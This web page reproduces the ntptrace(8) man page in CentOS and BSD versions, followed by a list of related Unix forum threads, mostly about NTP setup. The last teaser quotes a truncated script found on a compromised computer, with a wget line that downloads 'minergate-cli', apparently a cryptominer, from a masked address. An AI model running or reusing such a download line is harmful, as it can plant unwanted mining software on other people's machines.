Linux and UNIX Man Pages

Linux & Unix Commands - Search Man Pages

ntptrace(8) [centos man page]

ntptrace(8)						      System Manager's Manual						       ntptrace(8)

NAME
ntptrace - trace a chain of NTP servers back to the primary source SYNOPSIS
ntptrace [ -n ] [ -m maxhosts ] [ server ] DESCRIPTION
ntptrace is a perl script that uses the ntpq utility program to follow the chain of NTP servers from a given host back to the primary time source. For ntptrace to work properly, each of these servers must implement the NTP Control and Monitoring Protocol specified in RFC 1305 and enable NTP Mode 6 packets. If given no arguments, ntptrace starts with localhost. Here is an example of the output from ntptrace: % ntptrace localhost: stratum 4, offset 0.0019529, synch distance 0.144135 server2ozo.com: stratum 2, offset 0.0124263, synch distance 0.115784 usndh.edu: stratum 1, offset 0.0019298, synch distance 0.011993, refid 'WWVB' On each line, the fields are (left to right): the host name, the host stratum, the time offset between that host and the local host (as measured by ntptrace; this is why it is not always zero for "localhost"), the host synchronization distance, and (only for stratum-1 servers) the reference clock ID. All times are given in seconds. Note that the stratum is the server hop count to the primary source, while the synchronization distance is the estimated error relative to the primary source. These terms are precisely defined in RFC-1305. OPTIONS
-n Turns off the printing of host names; instead, host IP addresses are given. This may be useful if a nameserver is down. BUGS
This program makes no attempt to improve accuracy by doing multiple samples. SEE ALSO
ntpd(8) The official HTML documentation. This file was automatically generated from HTML source. ntptrace(8)

Check Out this Related Man Page

NTPTRACE(8)						    BSD System Manager's Manual 					       NTPTRACE(8)

NAME
ntptrace -- trace a chain of NTP servers back to the primary source SYNOPSIS
ntptrace [-vdn] [-r retries] [-t timeout] [server] DESCRIPTION
ntptrace determines where a given Network Time Protocol (NTP) server gets its time from, and follows the chain of NTP servers back to their master time source. If given no arguments, it starts with localhost. Here is an example of the output from ntptrace: % ntptrace localhost: stratum 4, offset 0.0019529, synch distance 0.144135 server2ozo.com: stratum 2, offset 0.0124263, synch distance 0.115784 usndh.edu: stratum 1, offset 0.0019298, synch distance 0.011993, refid 'WWVB' On each line, the fields are (left to right): the host name, the host stratum, the time offset between that host and the local host (as mea- sured by ntptrace ; this is why it is not always zero for localhost ), the host synchronization distance, and (only for stratum-1 servers) the reference clock ID. All times are given in seconds. Note that the stratum is the server hop count to the primary source, while the syn- chronization distance is the estimated error relative to the primary source. These terms are precisely defined in RFC-1305. OPTIONS
-d Turns on some debugging output. -n Turns off the printing of host names; instead, host IP addresses are given. This may be useful if a nameserver is down. -r retries Sets the number of retransmission attempts for each host (default = 5). -t timeout Sets the retransmission timeout (in seconds) (default = 2). -v Prints verbose information about the NTP servers. AUTHORS
David L. Mills (mills@udel.edu) BUGS
This program makes no attempt to improve accuracy by doing multiple samples. BSD
March 29, 2000 BSD
Man Page

15 More Discussions You Might Find Interesting

1. UNIX for Dummies Questions & Answers

cannot access host servers from Exceed

we're having problems logging into host servers thru X-window(we use hummingbird exceed)...If I have 10 host servers, I only see 3 servers from exceed which I can access. I'm not sure whether this is a exceed x-window problems or host server problms or NFS problems or NIS problems?..no... (4 Replies)
Discussion started by: dookeobih
4 Replies

2. AIX

Setting up NTP

Hi all I am lookig for the procedure to setup a NTP server and clients. I would like to setup a machine in my DMZ that would be a client to a external time server and all my internal systems to be clients of the machine in the DMZ. I am on AIX 5.2 and the machine that will be in the DMZ will... (2 Replies)
Discussion started by: jhansrod
2 Replies

3. Shell Programming and Scripting

Monitoring processes of another host

Does anyone have a script, which monitors the processes of another host? (5 Replies)
Discussion started by: Andimotz80
5 Replies

4. AIX

How to activate the NTP on AIX 5.3

Hello everyone; can any help me to know how to activate the NTP on mein AIX server? The proprosal its thet 3 oder servers are synv on time. Thaks, and regards (3 Replies)
Discussion started by: GEIER
3 Replies

5. Solaris

Syncing server clocks in Solaris

I have several servers with different time settings. How do I sync these servers to the same time with NTP. Thanks, Remi (5 Replies)
Discussion started by: Remi
5 Replies

6. UNIX for Dummies Questions & Answers

Synchronizing primary and secondary name servers

Hello All, Does some one know how to synchronize the primary name server with the secondary without knowing the domains on which synchronization failed. I have just done /usr/sbin/ndc reload Alternatively how do i find out the domains on which synchronization failed? (4 Replies)
Discussion started by: a2z1982
4 Replies

7. UNIX for Dummies Questions & Answers

Add a new host to a primary server

Hi, I need to add a new host to a primary dns. what i need to add or change? I know i dont need to do nothing in named.conf and in the /etc/hosts. Thanks (2 Replies)
Discussion started by: Lisboeta_c95
2 Replies

8. Solaris

Cannot configure NTP client

Hi, I am trying to configure NTP client on my Solaris server, but I am getting error like: Jan 13 10:53:33 SPOTS ntpdate: no server suitable for synchronization foundMy ntp.conf file: bash-3.00# pwd /etc/inet bash-3.00# bash-3.00# bash-3.00# cat ntp.conf # ident "@(#)ntp.client... (5 Replies)
Discussion started by: nypreH
5 Replies

9. AIX

Configure one host against two ntp servers for redundancy

Dears all is it possible to have two NTP servers in one host ? how i can configure them . please advice (5 Replies)
Discussion started by: thecobra151
5 Replies

10. UNIX for Dummies Questions & Answers

NTP configuration issue..

hello Guys, I have an NTP problem on my SUN N240 server. External NTP server is being used for this box and when i run 'ntpq -p' i get connection refused message; ntpq -p ntpq: read: Connection refused Here this is the ntp.conf file: cat /etc/ntp.conf # BEGIN NTP SERVERS server... (6 Replies)
Discussion started by: dyavuzy1
6 Replies

11. HP-UX

NTP Backup Server HP-Ux

Hi Can Anyone guide me in how to setup NTP backup server? say if server_A fails then client should automatically adjust time using server_B. Currently my /etc/ntp.conf file is configured as following server= server_A peer=server_B Will this configuration solve my purpose? Need Urgent... (12 Replies)
Discussion started by: sai_2507
12 Replies

12. HP-UX

Ntp time synchronization problems

There is one server in my company where the time is out of sync. When I checked (compared with other servers whose time is correct), the XNTPD variable in /etc/rc.config.d/netdaemons was set as 0. I changed this to 1, and tried restarting the xntpd process with : # /sbin/init.d/xntpd start ... (4 Replies)
Discussion started by: anaigini45
4 Replies

13. UNIX for Beginners Questions & Answers

awk Behavior

Linux Release Uname details Data file Ive been at the command line for some time. Back as far as SCO and Interactive Unix. I have always used this construct without issues. I want to isolate the ip / field 1. As you can see .. the first line is "skipped". This works as... (6 Replies)
Discussion started by: sumguy
6 Replies

14. Red Hat

NTPD service restart and time synch

I am using ntpd service to sync our RHEL 5.9 system to synch with GPS clock. When I change the RHEL system time more than 7 seconds than the present system time (through "Datetime" command), ntpd service does not adjust the system time to the present GPS time.But if the time is with in 7 seconds,... (6 Replies)
Discussion started by: Anjan Ganguly
6 Replies

15. Shell Programming and Scripting

Stratum - What is this shell doing?

Hello, I've found someone's footprints on my friend's computer. Could you please explain what is this guy doing ? I see Chinese ip addresses in log files. #!/bin/bash #trap 'kill -9 $PID 2>/dev/null' EXIT echo "Downloading libraries." 1>&2 wget http://***masked_ip***/minergate-cli -O... (3 Replies)
Discussion started by: baris35
3 Replies